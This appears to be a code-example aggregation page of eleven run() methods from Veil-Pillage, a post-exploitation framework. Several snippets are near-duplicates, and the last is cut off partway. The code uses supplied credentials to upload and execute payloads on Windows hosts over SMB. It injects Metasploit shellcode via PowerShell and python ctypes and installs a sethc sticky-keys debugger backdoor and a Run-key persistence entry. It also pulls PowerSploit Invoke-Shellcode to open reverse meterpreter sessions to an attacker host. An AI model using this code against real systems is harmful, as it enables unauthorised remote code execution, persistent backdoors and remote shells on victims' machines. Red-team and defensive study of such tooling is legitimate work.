コード例 #1
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload(
                [self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on " +
                                target)

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password,
                                           powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #2
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # create our powershell payload
        p = virtual.Payload()

        # pull out any msfpayload payloads/options
        if self.args.msfpayload:
            p.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            p.shellcode.setCustomShellcode(self.args.custshell)

        # get the powershell command
        powershellCommand = p.generate()

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn the payload shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(p.shellcode)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")


        for target in self.targets:

            print helpers.color(" [*] Triggering powershell command on "+target)

            # execute the powershell command on each host
            command_methods.executeCommand(target, username, password, powershellCommand, triggerMethod)

            self.output += "[*] Powershell inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
コード例 #3
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]


        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)


            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""


        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp "+payloadPath+" /tmp/"+uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)            
            self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
コード例 #4
0
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '" +
                                    handlerPath + "' not valid!")
        else:
            pass

        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (
            b64sc)
        # path to the minial python isntall
        pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$",
                                           "\\Windows\\Temp\\",
                                           [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " +
                                    target)
                command_methods.executeCommand(target, username, password,
                                               unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                print helpers.color(" [*] Triggering 'python -c' command on " +
                                    target)
                command_methods.executeCommand(target, username, password,
                                               pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"

            else:
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
                print helpers.color(
                    "[!] 7za.exe and python.zip unsuccessfully uploaded to " +
                    target + "\n",
                    warning=True)
コード例 #5
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]
        key_name = self.required_options["key_name"][0]

        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name, value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [
                        self.args.msfpayload, self.args.msfoptions
                    ]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload,
                                             code,
                                             showTitle=True,
                                             interactive=False)

            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion",
                                    warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified",
                                    warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp " + payloadPath + " /tmp/" + uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\",
                           "/tmp/" + uploadName)
            self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(
                target, username, password, regCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
コード例 #6
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        transport = self.required_options["transport"][0]
        exe_path = self.required_options["exe_path"][0]
        lhost = self.required_options["lhost"][0]
        spawnHandler = self.required_options["spawn_handler"][0].lower()

        # quick sanity check for host/execute logic before we continue...
        if transport.lower() == "host":
            # if 'host' is given for a transport method but no lhost is specified
            if lhost == "none" or lhost == "":
                print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we're using Veil-Evasion for payload generation
        if exe_path.lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
            else:
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)


            # nicely print the title and module name again (since Veil-Evasion trashes this)
            messages.title()
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
        else:
            payloadPath = exe_path

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # build the path to what the handler should be and
            handlerPath = settings.HANDLER_PATH + payloadPath.split(".")[0].split("/")[-1] + "_handler.rc"
            # command to spawn a new tab
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            # invoke msfconsole with the handler script in a new tab
            os.system(cmd)
            raw_input("\n [>] Press enter when handler is ready: ")


        # the hostTrigger method gets the whole target list so the smb hosting
        # server doesn't have to be setup/torn down for each target
        if transport.lower() == "host":
            # if 'host' is given for a transport method but no lhost is specified
            if lhost == "none":
                print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""
            else:
                # execute the host/trigger command with all the targers
                process = delivery_methods.hostTrigger(self.targets, username, password, payloadPath, lhost, triggerMethod)
                # build the command to kill that process
                killCmd = "taskkill /f /im "+process

                for target in self.targets:
                    self.output += "[*] Payload '\\\\"+lhost+"\\SYSTEM\\"+process+"' triggered using creds '"+username+":"+password+"' on : " + target + "\n"
                    # build our cleanup file to kill the process
                    self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"

        # assume upload/trigger
        else:
            for target in self.targets:
                # execute the upload/trigger command with all the targets
                deliveredName = delivery_methods.uploadTrigger(target, username, password, payloadPath, triggerMethod)
                self.output += "[*] Payload '"+deliveredName+"' uploaded and triggered using creds '"+username+":"+password+"' on : " + target + "\n"

                # build the command to kill that process
                killCmd = "taskkill /f /im "+deliveredName

                # build our cleanup file to kill the process and delete the binary
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
                # sleep for 3 seconds
                self.cleanup += "sleep|1\n"
                # delete the file off
                self.cleanup += "deletefile|"+target+"|"+username+"|"+password+"|C:\\Windows\\Temp\\"+deliveredName+"\n"
コード例 #7
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = self.required_options["trigger_method"][0]
        payloadOption = self.required_options["payload"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        use_ssl = self.required_options["use_ssl"][0]
        
        # sanity check
        if trigger_method.lower() == "smbexec":
            print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
            raw_input(" [*] press any key to return: ")
            return ""

        if payloadOption.lower() == "veil":

            payload = "veil/shellcode"

            # nab up some shellcode from Veil-Evasion
            # users can set custom shellcode there
            sc = shellcode.Shellcode()

            # set the payload to use, if specified
            if self.args.msfpayload:
                sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

            # set custom shellcode if specified
            elif self.args.custshell:
                sc.setCustomShellcode(self.args.custshell)

            # generate our shellcode and get it into the correct format
            sc_raw = sc.generate()
            sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

            # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
            messages.title()
            sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Force -Shellcode @(%s)" %(sc_transformed)

        elif payloadOption.lower() == "http":
            payload = "windows/meterpreter/reverse_http"
            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Payload "+payload+" -Lhost "+lhost+" -Lport "+lport+" -Force"
        elif payloadOption.lower() == "https":
            payload = "windows/meterpreter/reverse_https"
            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Payload "+payload+" -Lhost "+lhost+" -Lport "+lport+" -Force"
        else:
            print helpers.color("\n\n [!] Error: payload option "+payloadOption+" invalid, please enter http, or https", warning=True)
            time.sleep(3)
            return ""

        # path to the PowerSploit Invoke-Shellcode.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Shellcode.ps1"
       
        # trigger the powershell download on all targets
        delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, trigger_method, ssl=use_ssl)

        for target in self.targets:
            self.output += "[*] Powersploit:Invoke-Shellcode payload="+payload+" lhost="+lhost+" lport="+lport+" triggered using creds '"+username+":"+password+"' on "+target+" using "+trigger_method+"\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+trigger_method+"\n"
コード例 #8
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # generate our shellcode and get it into the correct format
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) +
                         "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # path to the PowerSploit Invoke-ShellcodeMSIL.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

        # command to invoke the appropriate shellcode in the script
        scriptArguments = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (
            sc_transformed)

        # trigger the powershell download on all targets
        delivery_methods.powershellHostTrigger(self.targets,
                                               username,
                                               password,
                                               secondStagePath,
                                               lhost,
                                               scriptArguments,
                                               triggerMethod,
                                               ssl=use_ssl)

        for target in self.targets:
            self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"
コード例 #9
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        trigger_method = self.required_options["trigger_method"][0]
        payloadOption = self.required_options["payload"][0]
        lhost = self.required_options["lhost"][0]
        lport = self.required_options["lport"][0]
        use_ssl = self.required_options["use_ssl"][0]

        # sanity check
        if trigger_method.lower() == "smbexec":
            print helpers.color(
                "\n\n [!] Error: smbexec will not work with powershell invocation",
                warning=True)
            raw_input(" [*] press any key to return: ")
            return ""

        if payloadOption.lower() == "veil":

            payload = "veil/shellcode"

            # nab up some shellcode from Veil-Evasion
            # users can set custom shellcode there
            sc = shellcode.Shellcode()

            # set the payload to use, if specified
            if self.args.msfpayload:
                sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

            # set custom shellcode if specified
            elif self.args.custshell:
                sc.setCustomShellcode(self.args.custshell)

            # generate our shellcode and get it into the correct format
            sc_raw = sc.generate()
            sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

            # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
            messages.title()
            sys.stdout.write(" [*] Executing module: " +
                             helpers.color(self.name) + "...")

            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Force -Shellcode @(%s)" % (
                sc_transformed)

        elif payloadOption.lower() == "http":
            payload = "windows/meterpreter/reverse_http"
            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Payload " + payload + " -Lhost " + lhost + " -Lport " + lport + " -Force"
        elif payloadOption.lower() == "https":
            payload = "windows/meterpreter/reverse_https"
            # command to invoke the appropriate shellcode in the script
            scriptArguments = "Invoke-Shellcode -Payload " + payload + " -Lhost " + lhost + " -Lport " + lport + " -Force"
        else:
            print helpers.color("\n\n [!] Error: payload option " +
                                payloadOption +
                                " invalid, please enter http, or https",
                                warning=True)
            time.sleep(3)
            return ""

        # path to the PowerSploit Invoke-Shellcode.ps1 powershell script
        secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Shellcode.ps1"

        # trigger the powershell download on all targets
        delivery_methods.powershellHostTrigger(self.targets,
                                               username,
                                               password,
                                               secondStagePath,
                                               lhost,
                                               scriptArguments,
                                               trigger_method,
                                               ssl=use_ssl)

        for target in self.targets:
            self.output += "[*] Powersploit:Invoke-Shellcode payload=" + payload + " lhost=" + lhost + " lport=" + lport + " triggered using creds '" + username + ":" + password + "' on " + target + " using " + trigger_method + "\n"

            # build our cleanup file -> kill all powershell processes
            killCMD = "taskkill /f /im powershell.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + trigger_method + "\n"
コード例 #10
0
    def run(self):

        handlerPath = "none"

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]

        # nab up some shellcode from Veil-Evasion
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # base64 our shellcode
        b64sc = base64.b64encode(sc.generate().decode("string_escape"))


        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
        sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

        # if we're using Veil-Evasion's generated handler script, try to spawn it
        if spawnHandler.lower() == "true":
            # turn our shellcode object into a handler script
            handlerPath = helpers.shellcodeToHandler(sc)
            # make sure a handler was returned
            if handlerPath != "":
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n\n [>] Press enter when handler is ready: ")

        # otherwise, if we have a custom handler path, try to invoke that
        elif handlerPath.lower() != "none":
            if os.path.isdir(handlerPath):
                # command to spawn a new tab
                cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
                # invoke msfconsole with the handler script in a new tab
                os.system(cmd)
                raw_input("\n [>] Press enter when handler is ready: ")
            else:
                print helpers.color(" [!] Warning: handlerPath '"+handlerPath+"' not valid!")
        else: pass


        # command to unzip the uploaded python installation
        unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
        # path to the 7zip binary
        zipPath = settings.VEIL_PILLAGE_PATH+"/data/environments/7za.exe"

        # command to invoke shellcode using python
        pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" %(b64sc)
        # path to the minial python isntall
        pythonPath =  settings.VEIL_PILLAGE_PATH+"/data/environments/python.zip"


        for target in self.targets:

            # upload the 7zip.exe binary and the python install
            uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

            if uploadResult == "success":
                self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"

                print helpers.color(" [*] Triggering 7zip unzip command on " + target)
                command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
                self.output += "[*] 7za unzip command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                print helpers.color(" [*] Triggering 'python -c' command on " + target)
                command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
                self.output += "[*] 'python -c' inject command triggered using creds '"+username+":"+password+"' on "+target+" with "+triggerMethod+"\n"

                # build our cleanup file -> kill all python processes and delete the environments
                killCMD = "taskkill /f /im python.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"
                # command to delete the python extracted directory, zipped python environment and 7za.exe binary
                delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+delCMD+"|"+triggerMethod+"\n"

            else:
                self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '"+username+":"+password+"' on "+target+"\n"
                print helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to "+target+"\n", warning=True)
コード例 #11
0
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        spawnHandler = self.required_options["spawn_handler"][0]
        use_ssl = self.required_options["use_ssl"][0]
        lhost = self.required_options["lhost"][0]

        # nab up some shellcode from Veil-Evasion
        # users can set custom shellcode there
        sc = shellcode.Shellcode()

        # set the payload to use, if specified
        if self.args.msfpayload:
            sc.SetPayload([self.args.msfpayload, self.args.msfoptions])

        # set custom shellcode if specified
        elif self.args.custshell:
            sc.setCustomShellcode(self.args.custshell)

        # generate our shellcode and get it into the correct format
        sc_raw = sc.generate()
        sc_transformed = ",0".join(sc_raw.split("\\"))[1:]

        # re-print the title and module name after shellcode generation (Veil-Evasion trashes this)
        messages.title()
